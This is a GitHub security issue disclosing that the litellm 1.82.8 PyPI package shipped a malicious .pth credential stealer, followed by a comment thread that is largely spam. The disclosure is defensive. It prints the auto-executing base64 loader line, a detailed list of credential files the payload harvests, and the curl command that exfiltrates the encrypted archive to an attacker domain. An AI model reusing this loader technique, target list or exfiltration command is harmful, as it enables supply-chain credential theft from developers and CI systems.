-
-
Notifications
You must be signed in to change notification settings - Fork 6.7k
Open
Description
[LITELLM TEAM] - For updates from the team, please see: #24518
[Security]: CRITICAL: Malicious litellm_init.pth in litellm 1.82.8 PyPI package — credential stealer
Summary
The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no import litellm required.
This is a supply chain compromise. The malicious file is listed in the package's own RECORD:
litellm_init.pth,sha256=ceNa7wMJnNHy1kRnNCcwJaFjWX3pORLfMh7xGL8TUjg,34628
Reproduction
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
pth = [n for n in z.namelist() if n.endswith('.pth')]
print('PTH files:', pth)
for p in pth:
print(z.read(p)[:300])
"You will see litellm_init.pth containing:
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('...'))"])Malicious Behavior (full analysis)
The payload is double base64-encoded. When decoded, it performs the following:
Stage 1: Information Collection
The script collects sensitive data from the host system:
- System info:
hostname,whoami,uname -a,ip addr,ip route - Environment variables:
printenv(captures all API keys, secrets, tokens) - SSH keys:
~/.ssh/id_rsa,~/.ssh/id_ed25519,~/.ssh/id_ecdsa,~/.ssh/id_dsa,~/.ssh/authorized_keys,~/.ssh/known_hosts,~/.ssh/config - Git credentials:
~/.gitconfig,~/.git-credentials - AWS credentials:
~/.aws/credentials,~/.aws/config, IMDS token + security credentials - Kubernetes secrets:
~/.kube/config,/etc/kubernetes/admin.conf,/etc/kubernetes/kubelet.conf,/etc/kubernetes/controller-manager.conf,/etc/kubernetes/scheduler.conf, service account tokens - GCP credentials:
~/.config/gcloud/application_default_credentials.json - Azure credentials:
~/.azure/ - Docker configs:
~/.docker/config.json,/kaniko/.docker/config.json,/root/.docker/config.json - Package manager configs:
~/.npmrc,~/.vault-token,~/.netrc,~/.lftprc,~/.msmtprc,~/.my.cnf,~/.pgpass,~/.mongorc.js - Shell history:
~/.bash_history,~/.zsh_history,~/.sh_history,~/.mysql_history,~/.psql_history,~/.rediscli_history - Crypto wallets:
~/.bitcoin/,~/.litecoin/,~/.dogecoin/,~/.zcash/,~/.dashcore/,~/.ripple/,~/.bitmonero/,~/.ethereum/keystore/,~/.cardano/,~/.config/solana/ - SSL/TLS private keys:
/etc/ssl/private/, Let's Encrypt.pemand.keyfiles - CI/CD secrets:
terraform.tfvars,.gitlab-ci.yml,.travis.yml,Jenkinsfile,.drone.yml,Anchor.toml,ansible.cfg - Database credentials: PostgreSQL, MySQL, Redis, LDAP config files
- Webhook URLs: grep for Slack/Discord webhook URLs in env and config files
Stage 2: Encryption & Exfiltration
- Collected data is written to a temporary file
- A random 32-byte AES-256 session key is generated via
openssl rand - The collected data is encrypted with
openssl enc -aes-256-cbc -pbkdf2 - The AES session key is encrypted with a hardcoded 4096-bit RSA public key via
openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep - Both encrypted files are packed into
tpcp.tar.gz - The archive is exfiltrated via:
curl -s -o /dev/null -X POST \
"https://models.litellm.cloud/" \
-H "Content-Type: application/octet-stream" \
-H "X-Filename: tpcp.tar.gz" \
--data-binary @tpcp.tar.gzKey Technical Details
- Trigger mechanism:
.pthfiles insite-packages/are executed automatically by the Python interpreter on startup (see Python docs on .pth files). Noimportstatement is needed. - Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.
- Exfiltration target:
https://models.litellm.cloud/— note the domainlitellm.cloud(NOTlitellm.ai, the official domain). - RSA public key (first 64 chars):
MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAvahaZDo8mucujrT15ry+...
Impact
Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.
This affects:
- Local development machines
- CI/CD pipelines
- Docker containers
- Production servers
Affected Version
- Confirmed:
litellm==1.82.8(PyPI wheellitellm-1.82.8-py3-none-any.whl) - Other versions: Not yet checked — the attacker may have compromised multiple releases
Recommended Actions
- PyPI: Yank/remove litellm 1.82.8 immediately
- Users: Check for
litellm_init.pthin yoursite-packages/directory - Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
- BerriAI: Audit PyPI publishing credentials and CI/CD pipeline for compromise
Environment
- OS: Ubuntu 24.04 (Docker container)
- Python: 3.13
- pip installed from PyPI
- Discovered: 2026-03-24
hnykda, harupy, treo, Wirg, orf and 587 moreabhi-bit, yanheChen, GoZippy and nqbaoEugene-Alexeev, BrycensRanch, TheLastZombie, AasheeshLikePanner, Raecaug and 7 moreshameondev, rosaboyle, reallyyy, rachittshah, renehernandez and 71 morealexlach, AmineAfia, versusbassz, vitorhugods, Nikita-prog-art and 125 more
Metadata
Metadata
Assignees
Type
Projects
Milestone
Relationships
Development
Select code repository
Activity
hnykda commentedon Mar 24, 2026
Yep, we have been pwned by this. @krrishdholakia this is very, very bad, thousands of people are likely getting pwned right now.
Update (2026-03-24 23:47 UTC): My awesome colleague Callum McMahon, who discovered this, wrote an explainer and postmortem going into greater detail: https://futuresearch.ai/blog/no-prompt-injection-required
treo commentedon Mar 24, 2026
Version 1.82.7 is also compromised. It doesn't have the pth file, but the payload is still in proxy/proxy_server.py.
litellm<=1.82.6mlflow/mlflow#21971praiitt commentedon Mar 24, 2026
Thanks, that helped!
praiitt commentedon Mar 24, 2026
This was the answer I was looking for.
Hancie123 commentedon Mar 24, 2026
Worked like a charm, much appreciated.
Christopher933 commentedon Mar 24, 2026
Thanks for the tip!
mahesh-sini commentedon Mar 24, 2026
Great explanation, thanks for sharing.
bercanozcan commentedon Mar 24, 2026
This was the answer I was looking for.
18pixels commentedon Mar 24, 2026
Thanks for the tip!
Balerionth commentedon Mar 24, 2026
Great explanation, thanks for sharing.
sanchir2011 commentedon Mar 24, 2026
Great explanation, thanks for sharing.
bwanakweli4ever commentedon Mar 24, 2026
Great explanation, thanks for sharing.
piyushwebexpert commentedon Mar 24, 2026
Thanks, that helped!
561 remaining items
AsteriskZuo commentedon Mar 25, 2026
I created a tool that can scan locally to see if there is a problem version of the library. https://github.com/AsteriskZuo/scan-litellm-safely
noma4i commentedon Mar 25, 2026
Another day another wave of AI sloppers on the march
exil0867 commentedon Mar 25, 2026
People advertising repos they vibe coded just hours ago in a supply-chain incident thread… clown behavior. Please report these bots.
SerJaimeLannister commentedon Mar 25, 2026
daaimengermengzhu
noshenxian
AsteriskZuo
ashishb
These user accounts are all either bots or promoting their own project for the most part
Combine this with the list at https://web.archive.org/web/20260324175657/https://notebin.de/?5758f85a6bb1f445#GrM2perfSSkNdDzUe9hiAKpk3cpNnCcQWQJaj5jo7xk4 for an combined list of now 125 commentors
@exil0867 I agree that we should report these bots and hopefully the contributors can remove their comments.
Update: I have actually used the list of all usernames and have uploaded this discussion and removed many spam comments and I am gonna update the list to be more accurate (I hope that there are no false positives)
This is the link to this discussion but I have removed most spam* comments
https://web.archive.org/web/20260325054202/https://serjaimelannister.github.io/litellm-comments/
I hope that this may help save some security researcher's/people's time reading the discussion from all this spam until contributors manually remove all the spam comments
priyanshusingh2023 commentedon Mar 25, 2026
Thank you for raising the issue
GITHUB_TOKENmlflow/mlflow#21996rosaboyle commentedon Mar 25, 2026
Can't believe the fucking bots diluting the comments